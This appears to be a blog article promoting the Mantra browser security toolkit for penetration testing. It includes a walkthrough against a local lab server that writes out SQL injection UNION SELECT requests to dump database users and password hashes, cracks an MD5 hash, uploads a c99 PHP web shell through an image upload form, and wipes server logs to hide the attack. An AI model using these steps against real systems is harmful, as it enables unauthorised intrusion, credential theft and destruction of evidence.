Right from the beginning, one Firefox and Google Chrome of the attractive features which made both of them outstanding was their expandability by means of installing useful extensions or add-ons. Programmers and developers started coding add-ons which helped to make the online web more easy and functional.
Naturally, there were add-ons developed for hackers too. Some went out dated, some were very powerful, and some
went unnoticed despite their powerful capabilities. We tried to get all the add-ons
of this type available out there on the internet, installed, analyzed, ranked and after that included them
on our own security toolkit.
By looking at the total number of exploit getting added to the exploit db, we think that an exploit development framework based on the browser can get very good acceptance from the security and hacking communities and this triggered the making of Mantra.
As of now Mantra is just a security toolkit rather than a full-fledged framework. We think it’s always better to give a choice to the end user rather than providing what we think is the best. So once the community is up and we have a crowd, we will go ahead and finalize the basic criteria for framework the and will work on their behalf.
Some of the features of Mantra
1. Its built on top of the browser – Saves lots of man power and learning curve.
2. It is Cross platform and flexible – It can easily run on Windows, Mac and Linux natively
3. Its free as “free beer” and “free speech”
4. Its open source, so you are free to use it or modify it your own way.
What is the use?
According to the present age standards, Mantra can be helpful to perform all five phases of attacks like reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining
access and covering tracks.
What Mantra is NOT?
1. It’s Not a one click automatic Pwnage tool
(please don’t think that it’s a stick in a magician’s hand. May be it be possible for us to make it a one click pwnage tool at least for some common types of attacks in the future. But not now)
2.It’s not mature enough to serve “everything” for a user to perform any sort of attack
3.It can’t be used as a replacement for your normal browser. It’s not fast enough, does not have plenty of space to play with etc.
4. You can find that there is more than one tool present in the toolkit for performing same sort of attacks but at the same time it lacks some simple tools here and there.
Who needs it?
Nice question. If you are into auditing, vulnerability assessment, penetration testing or information security training etc., you are going to be benefited from this project. We are looking out for bringing attention of the security researchers to the possibility of such a platform. If many people are use it, definitely the community will grow and we will be able to see more powerful functional and targeted tools
in the near future.
How you can contribute?
Since it’s an open source project, you are encouraged to become a part of it. We need developers for writing codes, modifying extension framework, theme designers for artworks and documentation writers to help better promote the project.
Beta version of Mantra Security Toolkit can be downloaded from http://getmantra.com/download/. As of now its available for both Linux and Windows platforms. It comes as a self extracting archive and needs almost
The graphical user interface provided by Mantra security toolkit is straight forward and easy to use.
The navigation bar is placed on top of the toolkit and it integrates the search bar into it. Search engines can be switched easily by using keywords or by clicking on their respective icons. As of now it supports searching on XSSed, SecurityFocus, OSVDB, PacketStorm, Pcapr, Extploit-DB, Scroogle, RFC, OVAL etc apart from normal search engines. It also supports auto-complete and real-time search suggestions.
The sidebar is located on the right side of the toolkit which gives one click access to all the tools available on the toolkit. Tools can be fine tuned according to the user’s needs from the sidebar itself. You can see all the tools packed into it at http://getmantra.com/tools/
The status bar on the bottom gives various information about the current webpage including remote IP, location details, technologies used etc. More details about particular information can be obtained by simply clicking on the respective notifications on the status bar. There are also a proxy button, to switch between proxies, Passive Reconnaissance button, to conduct packet less discovery of target resources, quick profile switcher to play with cookies etc.
A quick demo
In this particulate demo we will try to root a remote web server using Mantra security toolkit.
Due to space limitation, I have not included the screen shots. To view them please follow the image links mentioned under every step.
I’m on the home page of the website now.
As of now Mantra does not have any crawling mechanism to find vulnerable URLs on the website (read it as a limitation). So we have to do that manually. I went through all the pages of web site and found a page with URL input
I launched Hackbar by pressing F9. Hackbar is a tool for doing basic audits on web pages.
The power of single quote. I’m checking the web site is actually sanitizing the input or not by putting a ‘ at the end of the URL and pressing on the Execute button.
Since the page content is different from the previous one. I can make sure that the web page is not sanitizing the input from the URL.
Let’s find out the number of tables in the current database.
[code]http://192.168.132.128/?id=13 order by 1[/code]
I have to keep on increasing the last number till I see any changes in the page. In usual practice it’s going to be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
[code]http://192.168.132.128/?id=13 order by 7[/code]
I went up to 7 and no change till now.
[code]http://192.168.132.128/?id=13 order by 7[/code]
I’m on 8 now and now I can see the page changed.
[code]http://192.168.132.128/?id=13 order by 8[/code]
Now let’s go ahead and make a UNION statement. I can make it easily by going to SQL > UNION SELECT STATEMENT
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exist and there are only 7 tables.
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7[/code]
I replaced number 2 in URL with another SQL command, it got executed and the result is displayed on the page.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7[/code]
The current user is [email protected]
Let’s find out the version of the database. I replaced 2 in the URL with version() command.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7[/code]
5.0.45 is the version
Let me list all the tables.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables[/code]
From this list I found “user” as an interesting table.
Now I listed all the columns and its a big list.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns[/code]
I want to filter out columns from the table “user”.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name=’user'[/code]
Lets find the user name.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user[/code]
And password, of course.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user[/code]
Decrypting the password. I’m making a guess here that the password is encrypted using MD5 by looking at the length and other parameters of the data. I copied the MD5 hash, pasted it into the hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Voila.!!! I got the password!
Finding the log in page. Its was right in front of me
Logging in with the credentials I have
I’m an admin now. Look at my powers.
Let me add an event.
And of course I want to upload a picture.
Let me test the filtering mechanism of the website again. I’m trying to upload a PHP shell using the facility of website to upload custom picture. Lets see whether its possible or not.
Now I’m pressing on “Add Event” button.
Nice. Looks like it’s got uploaded.
Let’s see where the shell got uploaded to.
I’m trying to get the default upload location.
Looks like I got it.
Let me click on the c9shell.php file I just uploaded.
Voila. I have shell access!!
I simply clicked on the up button to get the root folder.
Now I can do whatever I wish. Deface the website, maintaining access or whatever.
What I’m interested is the log folder.
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks.
Let me go back and edit the log file.
I deleted the complete log entries. Now saving it.
Nice. Log file is empty now.
Now, let’s remove the c99 shell by pressing on Self Remove.
OK. Good Bye C99!!!
Well. It got deleted itself.
Happy Hacking.!!! 🙂